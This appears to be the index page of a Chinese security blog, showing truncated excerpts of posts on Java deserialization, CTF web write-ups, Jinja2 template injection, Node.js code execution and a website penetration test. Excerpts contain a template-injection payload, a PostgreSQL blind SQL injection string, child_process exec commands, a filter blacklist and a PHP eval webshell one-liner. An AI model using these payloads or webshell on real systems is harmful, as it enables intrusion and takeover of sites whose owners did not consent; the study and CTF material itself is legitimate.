BY Blog

再长的路,一步步也能走完,再短的路,不迈开双脚也无法到达。

Java 反射机制 简单总结

学了很久了 简单整理一下,方便后续使用

获取类 类名.class object.getClass() 实例化的对象通过getClass()方法获取 Class.forName(类名全路径) 属于反射 通过反射获取类构造方法 newInstance() 根据传递的参数创建类的对象 getConstructor() 根据参数列表获取public构造方法 getConstructors() ...

Java cc1利用链 简单分析

java java java

咕了很久的java反序列化cc1,主要根据p师傅的文章复现一边 加上自己见解 环境搭建 环境要求 Jdk 7 commons-collections:3.1 jdk7 源码下载 http://jdk7src.sourceforge.net jdk7 下载 https://www.oracle.com/downloads/opensourc...

2020-XCTF-华为杯-Web-WP

还是 tcl

mine1_1 令referer头等于 args ((request|attr(request.referrer)).a) => request.args.a { {((()|attr(((request|attr(request.referrer)).a))|attr(((request|attr(request.referrer)).b))|attr(((request|at...

RoarCTF-2020-Writeup

tcl

你能登陆成功吗 && 你能登陆成功吗-reverse PostgreSQL数据库的注入 存在时间盲注 username=admin&password=' AND 8721=(SELECT 8721 FROM PG_SLEEP(5))-- NwFA 利用and 如果第一个条件为真则继续判断下一个条件,否则直接跳过 过滤了空格,直接查password ,利用...

Nodejs 代码执行利用 与 常见数据库的docker环境

简单小总结一下

nodejs 代码执行利用 贴一下之前总结关于nodejs利用的知识点 require("child_process").exec("whoami")toString() require("child_process").execSync("dir").toString() windows require("child_process").execFileSync("cmd",[...

Docker 虚拟技术总结

课堂分享的东西 ,划水~~~

什么是Docker 一种新兴的虚拟化方式 Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。 容器是完全使用沙箱机制(严格限制代码对本地系统资源访问,通过这样的措施来保证对代码的有效隔离,防...

Flask jinja2 内置过滤器 总结与分析

从源码上分析一下几个常用过滤器,以及不常见的用法,

[TOC] flask jinja2 内置过滤器 从jinja2 模板的源码看 Lib\site-packages\jinja2\filters.py 存在如下对应关系 FILTERS = { 'abs': abs, 'attr': do_attr, 'batch': ...

对某一网站的渗透测试

还挺有意思的,注入->getshell->提权->破解php加密(网站防护做的。。)

对网站的渗透 端口扫描 存在mysql,ftp,ssh,http,ajp,tomcat 多个服务 ajp 存在漏洞 2020-10487 Tomcat apj 存在任意文件读 ,但没啥用 WEB-INF/web.xml 里没有任何东西 app上抓了个包,发现了比较可以的api 对name进行注入, 输入"||1||" 返回正常数据 ,但无法注释后面的内容,只能布尔注...

几个有意思的题解

flaskssti php伪协议 Laravel反序列化

第九届山东省赛 web2 flask 方法一 黑名单 blacklist = ['os', '+', '[', ']', "'", '{}', 'add', 'chr', 'ord', 'mro', 'get', 'form', 'class', 'base', 'request', 'session', 'cookies', 'headers', 'redirect', 'ur...

记录几个比较简单的知识

nginx 代理 和 蚁剑流量加密

1.蚁剑 自定义加密传输 绕过waf检测 base64 加密传输 <?php @eval(base64_decode($_REQUEST['diego'])); ?> /** * php::base64编码器 * Create at: 2020/10/23 12:02:12 */ 'use strict'; /* * @param {String} pwd ...